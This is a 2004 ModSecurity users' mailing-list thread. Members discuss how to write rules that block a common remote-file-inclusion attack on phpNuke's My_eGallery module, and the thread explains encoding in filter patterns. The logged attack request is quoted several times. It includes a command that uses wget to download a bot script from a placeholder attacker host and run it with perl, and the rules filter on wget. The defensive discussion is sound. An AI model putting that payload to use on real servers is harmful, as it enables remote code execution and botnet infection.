Thread: [mod-security-users] rule for common My_eGallery exploit

Brought to you by: victorhora, zimmerletw

mod-security-users

[mod-security-users] rule for common My_eGallery exploit

From: Hugh B. <hbe...@ya...> - 2004-08-23 12:01:48

Hi,

Does anyone have a good rule to catch the following types of requests:

GET
/modules/My_eGallery/public/displayCategory.php?basepath=http://hacker.com/spy.gif?&cmd=cd%20/var/tmp;wget%20http://www.hacker2.org/bot.txt;perl%20bot.txt

This is a very common exploit against phpnuke's eGallery module.

I am new to mod_security and am not sure what the best rule would be to block these requests
without also blocking other requests with the work basepath in it.

I think the key part would be something like:

block everything with the string:

?basepath

or

?basepath=http

Any ideas?

Thanks in advance!



		
_______________________________
Do you Yahoo!?
Win 1 of 4,000 free domain names from Yahoo! Enter now.
http://promotions.yahoo.com/goldrush

Re: [mod-security-users] rule for common My_eGallery exploit

From: Ivan R. <iv...@we...> - 2004-08-23 12:30:02

Hugh Beaumont wrote:
> Hi,
> 
> Does anyone have a good rule to catch the following types of requests:
> 
> GET
> /modules/My_eGallery/public/displayCategory.php?basepath=http://hacker.com/spy.gif?&cmd=cd%20/var/tmp;wget%20http://www.hacker2.org/bot.txt;perl%20bot.txt
> 
> This is a very common exploit against phpnuke's eGallery module.
> 
> I am new to mod_security and am not sure what the best rule would be to block these requests
> without also blocking other requests with the work basepath in it.
> 
> I think the key part would be something like:
> 
> block everything with the string:
> 
> ?basepath
> 
> or
> 
> ?basepath=http
> 
> Any ideas?

  Assuming the basepath parameter is not supposed to be used from the
  outside at all, the correct approach is to reject all requests
  that contain this parameter:

  SecFilterSelective ARG_basepath "!^$"

  If there are valid cases where this parameter is used then you'll need
  to give us some examples of valid uses. We could then create a rule
  that accepts only valid (safe) requests and rejects attack.

  If the only way to exploit the application is by fetching and
  executing a remote page then a simple:

  SecFilterSelective ARG_basepath "!http:"

  will probably do. But I suspect users can also use the basepath
  parameter to read arbitrary files from the server, which is probably
  something you don't want either.

-- 
ModSecurity (http://www.modsecurity.org)
[ Open source IDS for Web applications ]

Re: [mod-security-users] rule for common My_eGallery exploit

From: Hugh B. <hbe...@ya...> - 2004-08-23 12:43:31

--- Ivan Ristic <iv...@we...> wrote:

> Hugh Beaumont wrote:

> > Does anyone have a good rule to catch the following types of requests:
> > 
> > GET
>
/modules/My_eGallery/public/displayCategory.php?basepath=http://hacker.com/spy.gif?&cmd=cd%20/var/tmp;wget%20http://www.hacker2.org/bot.txt;perl%20bot.txt
> > 
>   Assuming the basepath parameter is not supposed to be used from the
>   outside at all, the correct approach is to reject all requests
>   that contain this parameter:
> 
>   SecFilterSelective ARG_basepath "!^$"
> 

Thanks so much - very helpful!

I have another question if you do not mind :

I'm trying to block all requests of the type :

"wget somefile"

"cat somefile"

etc.

These usually hit the logs as:

wget%20somefile

However when I look at some of the example rules on the website, these seem to be handled as:

wget\x20

I assume the \x is a placeholder for %

I currently use :

SecFilterSelective THE_REQUEST "wget\x20"

What would the recommended way of blocking this type of stuff be?

What exactly does \x mean in a filter?

Thanks again!

_______________________________
Do you Yahoo!?
Win 1 of 4,000 free domain names from Yahoo! Enter now.
http://promotions.yahoo.com/goldrush

Re: [mod-security-users] rule for common My_eGallery exploit

From: Ivan R. <iv...@we...> - 2004-08-23 14:18:11

> However when I look at some of the example rules on the website, these seem to be handled as:
> 
> wget\x20
> 
> I assume the \x is a placeholder for %

  They do the same thing. % is used in URL encoding, while \x is
  used in regular expressions. In both cases, the two characters
  that follow are a hexidecimal representation of the character.

  A simple space does not have to be encoded with \x20, but some
  other characters (\x0a, \x0d) do.

-- 
ModSecurity (http://www.modsecurity.org)
[ Open source IDS for Web applications ]